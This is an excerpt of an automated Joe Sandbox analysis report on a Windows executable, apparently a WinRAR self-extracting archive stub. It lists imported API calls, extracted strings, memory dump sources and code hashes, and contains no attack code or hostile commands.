                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00EA4792,00000000,00000000,00000000,00000000,00000000,00E99B37), ref: 00EA405F
                                                              • __fassign.LIBCMT ref: 00EA40DA
                                                              • __fassign.LIBCMT ref: 00EA40F5
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EA411B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,00EA4792,00000000,?,?,?,?,?,?,?,?,?,00EA4792,00000000), ref: 00EA413A
                                                              • WriteFile.KERNEL32(?,00000000,00000001,00EA4792,00000000,?,?,?,?,?,?,?,?,?,00EA4792,00000000), ref: 00EA4173
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              APIs
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              APIs
                                                                • Part of subcall function 00EA11E8: _free.LIBCMT ref: 00EA1211
                                                              • _free.LIBCMT ref: 00EA1272
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA127D
                                                              • _free.LIBCMT ref: 00EA1288
                                                              • _free.LIBCMT ref: 00EA12DC
                                                              • _free.LIBCMT ref: 00EA12E7
                                                              • _free.LIBCMT ref: 00EA12F2
                                                              • _free.LIBCMT ref: 00EA12FD
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00E9DA82,00E9FB08,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E18E
                                                              • _free.LIBCMT ref: 00E9E1C3
                                                              • _free.LIBCMT ref: 00E9E1EA
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E1F7
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID: x7
                                                              • API String ID: 3170660625-374306512
                                                              • Opcode ID: 7dfb370dfb56833d6f069437a98cf234a88ffec4f67ffdc4af9daedc44748070
                                                              • Instruction ID: 760df18ab8ab88896358db339ed51f970930d5b0fabdb863250cc1701068c85f
                                                              • Opcode Fuzzy Hash: 7dfb370dfb56833d6f069437a98cf234a88ffec4f67ffdc4af9daedc44748070
                                                              • Instruction Fuzzy Hash: 2F0149361456113F9F15A3775D86D2B26AEEBC53653222134F605F2391EE70C8054160
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E935C4,00E93527,00E937C8), ref: 00E93560
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E93576
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E9358B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 6a73ae3d2c68e8a0af947851dca6a20250f2cec0f67adde35edb0048f1d51c5a
                                                              • Instruction ID: f5d9a7c87956313cae68c2bc8a92df57a33ad87b188c88685b201c0846ca0c11
                                                              • Opcode Fuzzy Hash: 6a73ae3d2c68e8a0af947851dca6a20250f2cec0f67adde35edb0048f1d51c5a
                                                              • Instruction Fuzzy Hash: 81F022357403229F4F315F751DC02A622DC6B0EB583162038E905FB210EB20DE4D9AE1
                                                              APIs
                                                                • Part of subcall function 00E84948: _swprintf.LIBCMT ref: 00E8496E
                                                                • Part of subcall function 00E84948: _strlen.LIBCMT ref: 00E8498F
                                                                • Part of subcall function 00E84948: SetDlgItemTextW.USER32(?,00EB3154,?), ref: 00E849EF
                                                                • Part of subcall function 00E84948: GetWindowRect.USER32(?,?), ref: 00E84A29
                                                                • Part of subcall function 00E84948: GetClientRect.USER32(?,?), ref: 00E84A35
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                              • SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0$X+$X+$1
                                                              • API String ID: 2622349952-1204512018
                                                              • Opcode ID: 884dc07fb683518c202cbc27035ee4b1a5afe3ad616873e13b7841be07732ce4
                                                              • Instruction ID: df6965976bd9a72adf3b9b386380fc99a6a14fbeed0a11cca4714b086ba8a122
                                                              • Opcode Fuzzy Hash: 884dc07fb683518c202cbc27035ee4b1a5afe3ad616873e13b7841be07732ce4
                                                              • Instruction Fuzzy Hash: 0EF0813010068DAADF552EA5884DBF93B9CAF85309F056094FE4DB91A1E774C496BB10
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9D26E
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00E9D280
                                                              • _free.LIBCMT ref: 00E9D293
                                                              • _free.LIBCMT ref: 00E9D2A4
                                                              • _free.LIBCMT ref: 00E9D2B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: @;
                                                              • API String ID: 776569668-3452451375
                                                              • Opcode ID: 9025baa984fc614a49b61f31080de3bdcd04c35fd43c85a8992c7884d533f002
                                                              • Instruction ID: 1661394c7ee44909f2a098045dbb0c6144a1e6f73df90aad08b0ff4bc9c3cbd9
                                                              • Opcode Fuzzy Hash: 9025baa984fc614a49b61f31080de3bdcd04c35fd43c85a8992c7884d533f002
                                                              • Instruction Fuzzy Hash: EFF054B04081B88FCE156F6AFEC24093BE5FB247203552606F4187A2B4CF300909CBD6
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00E97471,00E95B1C,00E94764), ref: 00E97488
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97496
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E974AF
                                                              • SetLastError.KERNEL32(00000000,00E97471,00E95B1C,00E94764), ref: 00E97501
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 2b42fd04b392a17467a090b2eb2ddaef8cd6cc84371e85993739561f1c08637c
                                                              • Instruction ID: 76dfc3f7ad390fe5a0906c0ff84e46685fa80f8e4a9af6a174ffc02360537632
                                                              • Opcode Fuzzy Hash: 2b42fd04b392a17467a090b2eb2ddaef8cd6cc84371e85993739561f1c08637c
                                                              • Instruction Fuzzy Hash: B801283261D2116EEF111BB66C8695B2F84EB02379331133AF474B51F2EF215C0C9194
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E83577
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,000000FF,000000FF,?,?,?,?,00E82663,000000FF,?,00000800,?,?,00E81CCF,?), ref: 00E83615
                                                              • _wcslen.LIBCMT ref: 00E8368B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 53435ae26bdbdc6e29325aa165cf85fbc094fd2bd739c4a578d80e25affaff61
                                                              • Instruction ID: b4924e5ac434da0742e4879cf662f18b40cc5834ac32b01b3e92abd3f219eb2d
                                                              • Opcode Fuzzy Hash: 53435ae26bdbdc6e29325aa165cf85fbc094fd2bd739c4a578d80e25affaff61
                                                              • Instruction Fuzzy Hash: 0E41DE71500214BACF22FF34CC41EEA77A9AF05B85B106426F81CB6251FB719F90DB60
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 00E91DC2
                                                                • Part of subcall function 00E900F6: _wcschr.LIBVCRUNTIME ref: 00E90191
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: 7eac719acad11e391968ce90d4e1e17cfd4901f347cd1df672dd7f20bb31cbf9
                                                              • Instruction ID: a195d76e1e32c7300a16a6cf8ba7b9770715500acd23dd45f5c834ed12503bf2
                                                              • Opcode Fuzzy Hash: 7eac719acad11e391968ce90d4e1e17cfd4901f347cd1df672dd7f20bb31cbf9
                                                              • Instruction Fuzzy Hash: 4731833290021AAADF25DB54CC41EEF73ECEB15754F4091A6E905F7181EBB4DE848F50
                                                              APIs
                                                              • IsWindowVisible.USER32(00020482), ref: 00E92DB8
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00020482,Function_000102B0,?), ref: 00E92DF4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: B*$B*$GETPASSWORD1
                                                              • API String ID: 3157717868-3857194741
                                                              • Opcode ID: fb37742ffcb6c0d6f98390e1e67700f2fea92344434a3258b5c27b7e38a3d13f
                                                              • Instruction ID: 9d43b978bfffe5f4b6093683396466e20470535aef301f2cab8fe098a3741441
                                                              • Opcode Fuzzy Hash: fb37742ffcb6c0d6f98390e1e67700f2fea92344434a3258b5c27b7e38a3d13f
                                                              • Instruction Fuzzy Hash: 1F1126326002047EDF12DA259C86BAA33D8F74A714F045039BE09BB291C6B5AC49C760
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E83497
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • _wcschr.LIBVCRUNTIME ref: 00E834B5
                                                              • _wcschr.LIBVCRUNTIME ref: 00E834C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: c304b2c3d202822a6dfc8d289210d80c40e309d65ad70c4ce23e4d9edccfb05b
                                                              • Instruction ID: 2c7b5ab7cbf2d3786c73ddcd6d9f02d8f4fba207d5c91a24470981a27197db40
                                                              • Opcode Fuzzy Hash: c304b2c3d202822a6dfc8d289210d80c40e309d65ad70c4ce23e4d9edccfb05b
                                                              • Instruction Fuzzy Hash: 0A016D271007117ADA3277758C43D67ABECDF86BB1B64A41AF46CF6082EA20D550C3F1
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 00E9072D
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E90752
                                                              • DeleteObject.GDI32(00000000), ref: 00E90784
                                                              • DeleteObject.GDI32(00000000), ref: 00E907A7
                                                                • Part of subcall function 00E8F8E2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E9077D,00000066), ref: 00E8F8F5
                                                                • Part of subcall function 00E8F8E2: SizeofResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F90C
                                                                • Part of subcall function 00E8F8E2: LoadResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F923
                                                                • Part of subcall function 00E8F8E2: LockResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F932
                                                                • Part of subcall function 00E8F8E2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00E9077D,00000066), ref: 00E8F94D
                                                                • Part of subcall function 00E8F8E2: GlobalLock.KERNEL32(00000000), ref: 00E8F95E
                                                                • Part of subcall function 00E8F8E2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E8F982
                                                                • Part of subcall function 00E8F8E2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E8F9C7
                                                                • Part of subcall function 00E8F8E2: GlobalUnlock.KERNEL32(00000000), ref: 00E8F9E6
                                                                • Part of subcall function 00E8F8E2: GlobalFree.KERNEL32(00000000), ref: 00E8F9ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                               • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: c975e0ce9ea50b02fb165b26504ecd1f9fdd03fc2631eb9706dd5631582ac9b3
                                                              • Instruction ID: d4359cd67839766a69cb2b5d1040945db3cfb0f64ba41b2132ee92abfb4682e2
                                                              • Opcode Fuzzy Hash: c975e0ce9ea50b02fb165b26504ecd1f9fdd03fc2631eb9706dd5631582ac9b3
                                                              • Instruction Fuzzy Hash: EB01F9369406056FCB1177A58C49ABF7AFAAF80B75F541025FD08BB392DF319C098BA1
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E9268B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E926A1
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E926B5
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00E926C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 6e933dbcb907885e92b7695fd79ab2defc46d9ecc4d41ba6ff4a97259aecea48
                                                              • Instruction ID: 59b73c62a5d1b495d55bdec0b2220596aabe93c8f0ce609daaa4fa5305708721
                                                              • Opcode Fuzzy Hash: 6e933dbcb907885e92b7695fd79ab2defc46d9ecc4d41ba6ff4a97259aecea48
                                                              • Instruction Fuzzy Hash: 710128327813597FDE10AF669C48FA777ACEB5E705F010018F341B94E2C2A2A909C775
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: @4$J4$Software\WinRAR SFX$h4
                                                              • API String ID: 176396367-2013926500
                                                              • Opcode ID: 5dd03e9b1a27a913570f0b89c2a907e5f6d770556eca77a51768599204e1b97a
                                                              • Instruction ID: c67348d6da09a10ad98ca50d1a4260b6ff3bbca02a40e23b43d97e747dd0a47e
                                                              • Opcode Fuzzy Hash: 5dd03e9b1a27a913570f0b89c2a907e5f6d770556eca77a51768599204e1b97a
                                                              • Instruction Fuzzy Hash: 22017171400228BEDF319B91DC4AFDF7FACEB05354F444056B509B40A1DBB18A88D7A0
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E9C769,00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002), ref: 00E9C7D8
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E9C7EB
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E9C769,00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000), ref: 00E9C80E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: e3e94c42940b8d38fec6ee026f1f23f6e54f2d95064b66f8113377f41e7e0e32
                                                              • Instruction ID: 64e2f740b2a7a858c7e73c3362bcb796a68d55eadfa1f9e7872d8c5852162cba
                                                              • Opcode Fuzzy Hash: e3e94c42940b8d38fec6ee026f1f23f6e54f2d95064b66f8113377f41e7e0e32
                                                              • Instruction Fuzzy Hash: 07F04471A01618BFDB159FA1EC09BAE7FB4EF49715F114168F805B6250DF306D49CA90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 63c6fad0c27308e77c94dfd6c17512139325cb4e89b7834529790c3a0696a99a
